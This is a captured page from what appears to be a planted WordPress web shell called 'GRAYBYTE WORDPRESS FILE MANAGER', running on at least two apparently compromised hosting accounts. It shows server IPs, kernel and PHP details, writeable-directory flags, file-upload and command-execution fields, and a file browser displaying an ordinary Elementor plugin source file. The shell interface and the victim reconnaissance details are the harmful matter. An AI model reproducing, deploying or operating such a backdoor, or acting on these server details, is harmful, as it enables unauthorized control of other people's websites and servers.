GRAYBYTE WORDPRESS FILE MANAGER2696

Server IP : 192.250.235.76 / Your IP : 45.90.210.12
System : Linux s2968.sgp1.stableserver.net 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
PHP Version : 8.2.29
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF

HOME

/home/tawsifschoice/borkaa.tawsifschoice.com/
1902120114081995

GRAYBYTE WORDPRESS FILE MANAGER7321

Server IP : 198.54.116.172 / Your IP : 216.73.216.36
System : Linux server322.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : mail
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF

HOME

/home/sadasgfe/fashiondebate.pk/wp-content/plugins/elementor/modules/pro-install/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/sadasgfe/fashiondebate.pk/wp-content/plugins/elementor/modules/pro-install//module.php
<?php
namespace Elementor\Modules\ProInstall;

use Elementor\Core\Admin\Menu\Admin_Menu_Manager;
use Elementor\Core\Common\Modules\Connect\Module as ConnectModule;
use Elementor\Core\Base\Module as BaseModule;
use Elementor\Plugin;
use Elementor\Utils;
use Elementor\Modules\EditorOne\Classes\Menu_Data_Provider;

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly.
}

class Module extends BaseModule {

	public function get_name() {
		return 'pro-install';
	}

	public static function is_active() {
		return ! Utils::has_pro() && current_user_can( 'manage_options' );
	}

	public function __construct() {
		parent::__construct();

		add_action( 'admin_post_elementor_do_pro_install', [ $this, 'admin_post_elementor_do_pro_install' ] );

		add_action( 'elementor/connect/apps/register', function ( ConnectModule $connect_module ) {
			$connect_module->register_app( 'pro-install', Connect::get_class_name() );
		} );

		add_action( 'elementor/admin/menu/register', function( Admin_Menu_Manager $admin_menu ) {
			if ( ! $this->is_editor_one_active() ) {
				$admin_menu->register(
					'elementor-connect-account',
					new Pro_Install_Menu_Item(
						$this->get_connect_app(),
						$this->get_pro_install_page_assets(),
					)
				);
			}
		}, 116 );

		add_action( 'elementor/editor-one/menu/excluded_level3_slugs', function ( array $excluded_slugs ): array {
			$excluded_slugs[] = 'elementor-connect';
			return $excluded_slugs;
		} );

		add_action( 'elementor/editor-one/menu/register', function( Menu_Data_Provider $menu_data_provider ) {
			$menu_data_provider->register_menu(
				new Editor_One_Connect_Account_Menu_Item(
					$this->get_connect_app(),
					$this->get_pro_install_page_assets()
				)
			);
		} );
	}

	private function is_editor_one_active(): bool {
		return (bool) Plugin::instance()->modules_manager->get_modules( 'editor-one' );
	}

	private function get_connect_app(): Connect {
		return Plugin::$instance->common->get_component( 'connect' )->get_app( 'pro-install' );
	}

	public function admin_post_elementor_do_pro_install() {
		if ( ! current_user_can( 'install_plugins' ) ) {
			wp_die( esc_html__( 'You do not have sufficient permissions to access this page.', 'elementor' ) );
		}

		check_admin_referer( 'elementor_do_pro_install' );

		$app = $this->get_connect_app();
		$download_link = $app->get_download_link();

		if ( empty( $download_link ) ) {
			wp_die( esc_html__( 'There are no available subscriptions at the moment.', 'elementor' ) );
		}

		$plugin_installer = new Plugin_Installer( 'elementor-pro', $download_link );
		$response = $plugin_installer->install();

		if ( is_wp_error( $response ) ) {
			wp_die( esc_html( $response->get_error_message() ) );
		}

		wp_safe_redirect( admin_url( 'admin.php?page=elementor-license' ) );
	}

	private function get_pro_install_page_assets(): array {
		return [
			'elementor-pro-install-events',
			$this->get_js_assets_url( 'pro-install-events' ),
			[ 'elementor-common' ],
			ELEMENTOR_VERSION,
			true,
		];
	}
}

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
December 23 2025 11:45:16
sadasgfe / sadasgfe
0755
connect-page-renderer.php
5.229 KB
December 22 2025 17:25:58
sadasgfe / sadasgfe
0644
connect.php
0.864 KB
September 15 2025 14:10:16
sadasgfe / sadasgfe
0644
editor-one-connect-account-menu-item.php
1.396 KB
December 22 2025 17:25:58
sadasgfe / sadasgfe
0644
module.php
2.959 KB
December 22 2025 17:25:58
sadasgfe / sadasgfe
0644
plugin-installer.php
2.293 KB
September 15 2025 14:10:16
sadasgfe / sadasgfe
0644
pro-install-menu-item.php
1.006 KB
December 22 2025 17:25:58
sadasgfe / sadasgfe
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF